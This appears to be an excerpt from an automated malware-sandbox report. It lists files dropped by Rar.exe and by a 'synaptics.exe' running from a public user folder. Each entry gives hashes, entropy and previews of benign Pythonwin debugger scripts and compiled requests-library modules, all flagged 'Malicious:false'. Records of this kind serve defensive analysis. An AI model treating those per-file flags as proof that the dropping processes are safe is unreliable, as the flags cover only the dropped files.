                                                                                                                                                                                      SHA-256:D870FBD44C3969CA82BE1260B66C92DFE6EDFFB4F87D23506E0640D103E03C7F
                                                                                                                                                                                      SHA-512:70B36C0493DB7D575CD455F693679111F6F4F59F33BD7B663D9FCF9C09AC72C013E5CE34869D62F45C7840F573DB60DDE332EDC1EE6F199ECE71D170E93477B0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32ui.from pywin.mfc import dialog..from . import dbgcon...class DebuggerOptionsPropPage(dialog.PropertyPage):. def __init__(self):. dialog.PropertyPage.__init__(self, win32ui.IDD_PP_DEBUGGER).. def OnInitDialog(self):. options = self.options = dbgcon.LoadDebuggerOptions(). self.AddDDX(win32ui.IDC_CHECK1, dbgcon.OPT_HIDE). self[dbgcon.OPT_STOP_EXCEPTIONS] = options[dbgcon.OPT_STOP_EXCEPTIONS]. self.AddDDX(win32ui.IDC_CHECK2, dbgcon.OPT_STOP_EXCEPTIONS). self[dbgcon.OPT_HIDE] = options[dbgcon.OPT_HIDE]. return dialog.PropertyPage.OnInitDialog(self).. def OnOK(self):. self.UpdateData(). dirty = 0. for key, val in list(self.items()):. if key in self.options:. if self.options[key] != val:. self.options[key] = val. dirty = 1. if dirty:. dbgcon.SaveDebuggerOptions(self.options). # If there is a debugger open, then set
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):845
                                                                                                                                                                                      Entropy (8bit):5.242340248921855
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:8N3bW3FrvlwGPFjRTRPZgpXe5e6gewNhdintvgj:OW3FrvKWjRTRPQXF6DWhdita
                                                                                                                                                                                      MD5:8A390D63882C0842EAC376270BFF2C53
                                                                                                                                                                                      SHA1:C6B8A92591B61DDD2FA043FA8503E56630DC23F3
                                                                                                                                                                                      SHA-256:E4705329844F721A47F176046BF9DFFD9BA11519E19F83361F88D3679610F7DD
                                                                                                                                                                                      SHA-512:5350F07516A87D879C61B122671EA9DF0CA115A795EC6AB18230A8F87059F7A8EEA2A00FEBC40A38AF699AA464B04A9BDB5BA67D1A03B19BD5BC31335689316A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# General constants for the debugger..DBGSTATE_NOT_DEBUGGING = 0.DBGSTATE_RUNNING = 1.DBGSTATE_BREAK = 2.DBGSTATE_QUITTING = 3 # Attempting to back out of the debug session...LINESTATE_CURRENT = 0x1 # This line is where we are stopped.LINESTATE_BREAKPOINT = 0x2 # This line is a breakpoint.LINESTATE_CALLSTACK = 0x4 # This line is in the callstack...OPT_HIDE = "hide".OPT_STOP_EXCEPTIONS = "stopatexceptions"..import win32api.import win32ui...def DoGetOption(optsDict, optName, default):. optsDict[optName] = win32ui.GetProfileVal("Debugger Options", optName, default)...def LoadDebuggerOptions():. opts = {}. DoGetOption(opts, OPT_HIDE, 0). DoGetOption(opts, OPT_STOP_EXCEPTIONS, 1). return opts...def SaveDebuggerOptions(opts):. for key, val in opts.items():. win32ui.WriteProfileVal("Debugger Options", key, val).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1558
                                                                                                                                                                                      Entropy (8bit):4.832730052620307
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:tsLtgxWvUmdvRsiZwAotaXzduXj7/2X0yKRluFrDLJ43iKMrGhgZ4CFLt4Bs21Hx:eLtgovUmdvCUyIWjhpaApMrGVWes2fD
                                                                                                                                                                                      MD5:70ADAC0737589A094E215E979EF710B9
                                                                                                                                                                                      SHA1:265D1CD5DD7AA08406D50877273C8897ECBA3B16
                                                                                                                                                                                      SHA-256:FACDCAA49A31941B165DC13D8874AD9660D8D3505443C36C92C8C79219FB225D
                                                                                                                                                                                      SHA-512:14BEBA71693E8B17E945E89727CBC1A9978E43C6288CDF49F751EEB563AD65A50F85032C44D0C23414F2A2AD9A149498315DD3CAE31E5C9B9D9809D3FE6E97F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# dbgpyapp.py - Debugger Python application class.#.import sys..import win32con.import win32ui.from pywin.framework import intpyapp..version = "0.3.0"...class DebuggerPythonApp(intpyapp.InteractivePythonApp):. def LoadMainFrame(self):. "Create the main applications frame". self.frame = self.CreateMainFrame(). self.SetMainFrame(self.frame). self.frame.LoadFrame(win32ui.IDR_DEBUGGER, win32con.WS_OVERLAPPEDWINDOW). self.frame.DragAcceptFiles() # we can accept these.. self.frame.ShowWindow(win32con.SW_HIDE). self.frame.UpdateWindow().. # but we do rehook, hooking the new code objects.. self.HookCommands().. def InitInstance(self):. # Use a registry path of "Python\Pythonwin Debugger. win32ui.SetAppName(win32ui.LoadString(win32ui.IDR_DEBUGGER)). win32ui.SetRegistryKey("Python %s" % (sys.winver,)). # We _need_ the Scintilla color editor.. # (and we _always_ get it now :-).. numMRU
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37931
                                                                                                                                                                                      Entropy (8bit):4.58728413955318
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0T7LEoH5gnkC0sYIEo9YkwmfSQpKqTTDZ3rys4odsZ+wBF9nACwDJC:87LEoZFCEElysb+BFGw
                                                                                                                                                                                      MD5:D299576416220004127894111BCFE164
                                                                                                                                                                                      SHA1:14875221C32AD621F20CDCA4A3295F72DE363E8E
                                                                                                                                                                                      SHA-256:0EB3E80F49D813EFF4F4861C9F9D47B2D0355019127789620D1DC2715E2321FA
                                                                                                                                                                                      SHA-512:C08D46D9DF477B63E09D81EDAAB2E84E50541C9AACDFF99FC91563BB93E1075D0A380E7720C681677C7E7897F7AF594A335B1B6F1F67A5564E1466787838B20E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# debugger.py..# A debugger for Pythonwin. Built from pdb...# Mark Hammond (MHammond@skippinet.com.au) - Dec 94...# usage:.# >>> import pywin.debugger.# >>> pywin.debugger.GetDebugger().run("command")..import bdb.import os.import pdb.import string.import sys.import traceback.import types..import commctrl.import pywin.docking.DockingBar.import win32api.import win32con.import win32ui.from pywin.framework import app, editor, interact, scriptutils.from pywin.framework.editor.color.coloreditor import MARKER_BREAKPOINT, MARKER_CURRENT.from pywin.mfc import afxres, dialog, object, window.from pywin.tools import browser, hierlist..# import win32traceutil.if win32ui.UNICODE:. LVN_ENDLABELEDIT = commctrl.LVN_ENDLABELEDITW.else:. LVN_ENDLABELEDIT = commctrl.LVN_ENDLABELEDITA..from .dbgcon import *..error = "pywin.debugger.error"...def SetInteractiveContext(globs, locs):. if interact.edit is not None and interact.edit.currentView is not None:. interact.edit.currentView.SetContext(
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):927
                                                                                                                                                                                      Entropy (8bit):4.475632683391388
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:i/hppkcl/DSHG0mlHFpi67XjfRkDWyFX6SV8Oj8afFIC25+8I/gW2cTpUmY56iuM:QGclbWGdL1L8X1FICAgdXNUaEJ
                                                                                                                                                                                      MD5:95B368EE7CF24DEE9C9BC5FC32400324
                                                                                                                                                                                      SHA1:F78E46CE77E7CAE1241C9A8C7EE21C0DB66E9114
                                                                                                                                                                                      SHA-256:E574D52E789A404DB2020B67F8B0178DA3F030991A7941EAA6483BAAE91438B5
                                                                                                                                                                                      SHA-512:1781ABD39FACA0094650813025DDB281C2363CDE64BFE875D9E8964EEAAEFC6DDE4F5B8F997A7C0DA0DCB4A0925F2C34716D0652DC34E7FD0FFDD41AAFE9A9AA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# NOTE NOTE - This module is designed to fail!.#.# The ONLY purpose for this script is testing/demoing the.# Pythonwin debugger package...# It does nothing useful, and it even doesnt do that!..import sys.import time..import pywin.debugger...def a():. a = 1. try:. b(). except:. # Break into the debugger with the exception information.. pywin.debugger.post_mortem(sys.exc_info()[2]). a = 1. a = 2. a = 3. a = 4...def b():. b = 1. pywin.debugger.set_trace(). # After importing or running this module, you are likely to be. # sitting at the next line. This is because we explicitely. # broke into the debugger using the "set_trace() function. # "pywin.debugger.brk()" is a shorter alias for this.. c()...def c():. c = 1. d()...def d():. d = 1. e(d). raise ValueError("Hi")...def e(arg):. e = 1. time.sleep(1). return e...a().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6785
                                                                                                                                                                                      Entropy (8bit):4.800464733521227
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:mQScOaWjg912oOtOEaRt+JXsI9XIz9XI39ncAhMQi0T:lS2hOtOlt+J8I9XIz9XI3Rc4i0T
                                                                                                                                                                                      MD5:DAD8AB84C464034B2AE584DD6B55D69C
                                                                                                                                                                                      SHA1:101480A5142B768286C0242154DB25FF83843077
                                                                                                                                                                                      SHA-256:1B9E8359F3A056305B8D251B5017CA2F952AFB420C1BE6A3FF7D5BB7F5F6B19F
                                                                                                                                                                                      SHA-512:46F72D3CE370BB18005DECC44D9E56D08FCB62B8B24C11A48BAA26CCDA81B3B340D9D5CF9696BC7FA5CEFD36A534126235BF180515F54378ABFD504D54590724
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# The default keyboard etc configuration file for Pythonwin..#.# The format of this file is very similar to a Windows INI file..# Sections are identified with [Section] lines, but comments.# use the standatd Python # character. Depending on the section,.# lines may not be in the standard "key=value" format...# NOTE: You should not need to modify this file..# Simply create a new .CFG file, and add an entry:.# [General].# BasedOn = Default.#.# and add your customisations. Then select your new configuration .# from the Pythonwin View/Options/Editor dialog..# This way you get to add your own customisations,.# but still take advantage of changes to the default.# configuration in new releases...# See IDLE.cfg for an example extension configuration..#.##########################################################################..[IDLE Extensions]..# The list of IDLE extensions to load. The extensions.# AutoIndent, AutoFormat and possibly others are.# "built-in", so do not need specifying...F
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3904
                                                                                                                                                                                      Entropy (8bit):5.791321651011868
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:QqPoGNOeYVGivMhhFJQlIgSdAhoFpVaxdses42WQXIBmPriV7:RP8MhqKgSehldFQYBJh
                                                                                                                                                                                      MD5:7685397CF789DFC37312B8EAF3555C09
                                                                                                                                                                                      SHA1:7735A67F384F99F3E0329AE5A6ED718623398BD7
                                                                                                                                                                                      SHA-256:A6AA7A8B53FDFD6CA9EA5F66141887813FD8D85A9AE5EC14BA32B8EB0D29077B
                                                                                                                                                                                      SHA-512:127DBD0D8E23DBE8BFEC36D35018DFDFA682A782E6DE47E21A1EB3B2BF190434BFFDC870C3E814711E7735927BC227A96939C3AC47FAB1D719B2F3FF6011B783
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):518
                                                                                                                                                                                      Entropy (8bit):5.543558804495626
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CAHUexOsG8ReRyu7msvBXV5b4SazcAFAu63WcJl7Rm7hooookk:tZxdOyqmsvBF5McAFAu6pbV4ek
                                                                                                                                                                                      MD5:F34FAB97167751D0938F0C747B335316
                                                                                                                                                                                      SHA1:3876CA526C774B062CBDCD3481E221FA2B7438D3
                                                                                                                                                                                      SHA-256:9B94A6069FC053D9E79712B463BB0FBC766CCF7666B680908FCFC91ED8143298
                                                                                                                                                                                      SHA-512:3C98F635C9A52E02C8C9A6F2B165BCE84DEF03A7D020DE25776E02F55042F0017B1EFC844D4B9B0A8FCBCB0A48D14C5F38599DE71BCD722A7BD4CF24FAB5CA6E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1594
                                                                                                                                                                                      Entropy (8bit):5.661162738180426
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:tUBUBWmfmQURGWydfvTsNWGioiklxL5VWQ5Ycr1OlX471aNNqagEb/m5Q5lC:tmUBWAmpGWydoNxLEcr1OlX4Ja8me5Q+
                                                                                                                                                                                      MD5:7C00653A65071DE9B419DFD972A56C04
                                                                                                                                                                                      SHA1:B944F10AEF29180778C9DD7C9AFBDE96D4036876
                                                                                                                                                                                      SHA-256:331128DF00D417CE3AADC20B60F393EA2FBCCBEA6B1C26ECA93175458385BB74
                                                                                                                                                                                      SHA-512:48EB8B4FC6CD590DCD22FE0C1A6ABCC127A9C69A10F46EBA07A8D3B947A4E7875F37456E9862F693B9229373A13404154ADE73E3F8EFAA59CCD01CF6772FC35E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determine if unicod
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22008
                                                                                                                                                                                      Entropy (8bit):5.431370530692121
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:YmMszG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:50TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                      MD5:3399C8238984D5327D85C8514EBF3E0E
                                                                                                                                                                                      SHA1:BA008396D022AB563CE4494369AC06B457CE0F97
                                                                                                                                                                                      SHA-256:546D7CDD90BAEB35E9112585C645C0126E88F05257BA7C398F5012BB8822DC64
                                                                                                                                                                                      SHA-512:E57338E05C00F38F5B551CE94970FDF31F05B7856499B5C1F0791C7BE433D4ED01A8E6F31CCF2B43B682C7E62CE03E0FED1A8094F5F0DA0DA74A63FBF20D70CF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6694
                                                                                                                                                                                      Entropy (8bit):5.146271398526042
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:s4kMfrO7AyGLluXW87ZolNAzj8t8JYat9DMGm6RGmOsGmfiC:wMDY7EeZjM88eRys2C
                                                                                                                                                                                      MD5:BC1A743CA5485B370EA176DC578855E4
                                                                                                                                                                                      SHA1:425CAC341512B87891826546C8901B8BD383FDD1
                                                                                                                                                                                      SHA-256:E7072750792C3C21F880A3B80F2CB52BC0B15B823B5386E07D194CBB5591EFDE
                                                                                                                                                                                      SHA-512:B21FBE488217CCB3A3092989ACB324D1551E97344CF27FFCA0CFAAE1F8F1857F6B95C64DDE61BBEC2C342E0AC1567F14B2A43440947F0F567939CF925E016023
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8090
                                                                                                                                                                                      Entropy (8bit):5.488935587177655
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:5B07m1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:X07m1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                      MD5:BE74449D59E06D7018FC0475CDFEAFBD
                                                                                                                                                                                      SHA1:510D878316BA1826A214B8F9548A26C53FC350D5
                                                                                                                                                                                      SHA-256:61C26C8289F3A92ABA57A92AD86E4657E0E8E943BA1DCE45E549A6AEFB0D7801
                                                                                                                                                                                      SHA-512:92B737A5C983ABD6778AEE7BE8BE31DFF564E72F53BCE1B8A479715AEB2283A112B929E7F9BF19EAEC5BBD6FB80C64C4BD99F5B74611F3A89B582C1A4DDC0952
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):595
                                                                                                                                                                                      Entropy (8bit):5.301750884907586
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CA67OBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc011Tl7RUcENM:t6jgbXKAhwa93DRCRpVZ
                                                                                                                                                                                      MD5:5E21190694AD00065397BB4B7056DEFC
                                                                                                                                                                                      SHA1:4362E1C2071D64DECD506BB372B8642C57245B71
                                                                                                                                                                                      SHA-256:88E7381FED1997431F3E1B9275AA92790348E0DC7FEEAF756689A40AD0413416
                                                                                                                                                                                      SHA-512:40F1A4CFA558827F60B025DBD27A6DA034C5675FBD1044294F497C1BCDC9A6C2E771F47975AB2697297F4C956D056F74578434832864D3D1D31F9E921B973E14
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1746
                                                                                                                                                                                      Entropy (8bit):5.60231557414537
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tNAUIkbGXHyOLyRJV79C9lKPV+5MTYGi4k0b8+:nR8XyUyRJJ98KPV+5f4kI
                                                                                                                                                                                      MD5:E3471661AC85A96390EB51C0769EE23D
                                                                                                                                                                                      SHA1:8F2AD0FDBCF1F37A1512B3136B9917B841B73AAE
                                                                                                                                                                                      SHA-256:0CE48FE6A1922C8DD92ED3108D3D634ECA1B75302B1531A322DF4E6368ED9129
                                                                                                                                                                                      SHA-512:AE8E69BC8DB41207441826023A47803104A53E1E6976E9B34F8386702710001BD31A11B40472DCF3398C9AE4AC39AF73819F6EE0BEFECB750F60D063CF58911A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable..Mapping..M
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18689
                                                                                                                                                                                      Entropy (8bit):5.258680165123524
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:lEvXh4n08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:lEvXh4n08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                      MD5:866C6DC11B93AAC8A8740A8140578745
                                                                                                                                                                                      SHA1:99883F789060ED7F17FB5EB315C2FCFC81D6E086
                                                                                                                                                                                      SHA-256:8CFDC300C202F9DE40CEBDC0D0F96ED897F5D8FA591136656414CBD80187E43F
                                                                                                                                                                                      SHA-512:0A559947748D592A56B148A0088581E13C8E1514B5FBF3AADB200EA288C7F4A962808317625725C60FB22347338A26755EBEE55F26F8DDE37F27F92ED258C5C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
